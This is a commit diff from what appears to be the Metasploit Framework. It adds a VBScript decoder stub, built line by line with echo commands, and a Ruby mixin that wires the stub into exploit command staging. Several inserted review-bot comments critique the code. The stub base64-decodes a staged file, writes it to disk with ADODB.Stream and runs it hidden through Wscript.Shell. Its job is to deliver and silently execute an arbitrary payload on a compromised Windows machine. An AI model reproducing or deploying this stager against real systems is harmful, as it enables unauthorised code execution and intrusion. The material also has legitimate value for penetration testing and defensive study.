add an adodb based cmdstager, fixes #1431
git-svn-id: file:///home/svn/framework3/trunk@11247 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
9c1576b20e
commit
fbd340aae8
|
@ -0,0 +1,50 @@
|
|||
echo Dim var_origLoc >>decode_stub
|
||||
echo var_origLoc = SetLocale(1033) >>decode_stub
|
||||
echo Set fs = CreateObject("Scripting.FileSystemObject") >>decode_stub
|
||||
echo Set file = fs.GetFile("ENCODED") >>decode_stub
|
||||
echo If file.Size Then >>decode_stub
|
||||
echo Set fd = fs.OpenTextFile("ENCODED", 1) >>decode_stub
|
||||
echo data = fd.ReadAll >>decode_stub
|
||||
echo data = Replace(data, vbCrLf, "") >>decode_stub
|
||||
echo data = base64_decode(data) >>decode_stub
|
||||
echo fd.Close >>decode_stub
|
||||
echo Dim var_strmConv, var_writedir, var_writestream >>decode_stub
|
||||
echo var_writedir = "DECODED" >>decode_stub
|
||||
echo Set var_strmConv = CreateObject("ADODB.Stream") >>decode_stub
|
||||
echo var_strmConv.Type = 2 >>decode_stub
|
||||
echo var_strmConv.Charset = "x-ansi" >>decode_stub
|
||||
echo var_strmConv.Open >>decode_stub
|
||||
echo var_strmConv.WriteText data, 0 >>decode_stub
|
||||
echo var_strmConv.Position = 0 >>decode_stub
|
||||
echo var_strmConv.Type = 1 >>decode_stub
|
||||
echo var_strmConv.SaveToFile var_writedir, 2 >>decode_stub
|
||||
echo SetLocale(var_origLoc) >>decode_stub
|
||||
echo Set shell = CreateObject("Wscript.Shell") >>decode_stub
|
||||
echo shell.run "DECODED", 0, false >>decode_stub
|
||||
echo Else >>decode_stub
|
||||
echo Wscript.Echo "The file is empty." >>decode_stub
|
||||
echo End If >>decode_stub
|
||||
echo Function base64_decode(byVal strIn) >>decode_stub
|
||||
echo Dim w1, w2, w3, w4, n, strOut >>decode_stub
|
||||
echo For n = 1 To Len(strIn) Step 4 >>decode_stub
|
||||
echo w1 = mimedecode(Mid(strIn, n, 1)) >>decode_stub
|
||||
echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>decode_stub
|
||||
echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>decode_stub
|
||||
echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>decode_stub
|
||||
echo If Not w2 Then _ >>decode_stub
|
||||
echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>decode_stub
|
||||
echo If Not w3 Then _ >>decode_stub
|
||||
echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>decode_stub
|
||||
echo If Not w4 Then _ >>decode_stub
|
||||
echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>decode_stub
|
||||
echo Next >>decode_stub
|
||||
echo base64_decode = strOut >>decode_stub
|
||||
echo End Function >>decode_stub
|
||||
echo Function mimedecode(byVal strIn) >>decode_stub
|
||||
echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>decode_stub
|
||||
echo If Len(strIn) = 0 Then >>decode_stub
|
||||
echo mimedecode = -1 : Exit Function >>decode_stub
|
||||
echo Else >>decode_stub
|
||||
echo mimedecode = InStr(Base64Chars, strIn) - 1 >>decode_stub
|
||||
echo End If >>decode_stub
|
||||
echo End Function >>decode_stub
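Review bot: The three `If Not wN Then _` guards in `base64_decode` depend on an undocumented sentinel: `mimedecode` returns -1 for an empty string or any character outside `Base64Chars` (including `=` padding), and VBScript's `Not` is bitwise on numbers, so only -1 evaluates to False. A reader who assumes a logical `Not` will read the guard as "w2 is zero", which is wrong. The form may have been chosen to keep `<` and `>` out of lines that go through `echo`, but nothing on the page says so. Since every line of this file is echoed into the stub, a comment here costs staged bytes, so the contract is better recorded in the mixin's header comment or the commit message. Note also that `w1` is never checked, so a stray character in the first position of a quad is folded into the output by `And 255` rather than rejected.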
|
|
@ -0,0 +1,39 @@
|
|||
##
|
||||
# $Id: $
|
||||
##
|
||||
|
||||
require 'msf/core/exploit/cmdstager'
|
||||
|
||||
module Msf
|
||||
|
||||
###
|
||||
#
|
||||
# This mixin provides an interface for staging cmd to arbitrary payloads
|
||||
#
|
||||
###
|
||||
module Exploit::CmdStagerVBS::ADODB
|
||||
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptString.new( 'DECODERSTUB', [ true, 'The VBS base64 file decoder stub to use.',
|
||||
File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_adodb")]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def create_stager(exe)
|
||||
Rex::Exploitation::CmdStagerVBS.new(exe)
|
||||
end
|
||||
|
||||
def execute_cmdstager(opts = {})
|
||||
opts.merge!({ :decoder => datastore['DECODERSTUB'] })
|
||||
super
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
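Review bot: `module Exploit::CmdStagerVBS::ADODB` uses the compact nested form, which raises NameError unless `Exploit::CmdStagerVBS` is already defined, yet this file only requires `msf/core/exploit/cmdstager`. It loads today only because the require list changed in this commit names `cmdstager_vbs` before `cmdstager_vbs_adodb`; add `require 'msf/core/exploit/cmdstager_vbs'` at the top so the file does not depend on that ordering. In `execute_cmdstager`, `opts.merge!` mutates the caller's hash; `opts = opts.merge(:decoder => datastore['DECODERSTUB'])` keeps the override local, and the bare `super` still forwards the reassigned value. The header comment is the generic CmdStager text and should say that this variant decodes with the ADODB.Stream-based stub selected by `DECODERSTUB`.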
|
|
@ -18,6 +18,7 @@ require 'msf/core/exploit/exe'
|
|||
# CmdStagers
|
||||
require 'msf/core/exploit/cmdstager'
|
||||
require 'msf/core/exploit/cmdstager_vbs'
|
||||
require 'msf/core/exploit/cmdstager_vbs_adodb'
|
||||
require 'msf/core/exploit/cmdstager_debug_write'
|
||||
require 'msf/core/exploit/cmdstager_debug_asm'
|
||||
require 'msf/core/exploit/cmdstager_tftp'
|
||||
|
|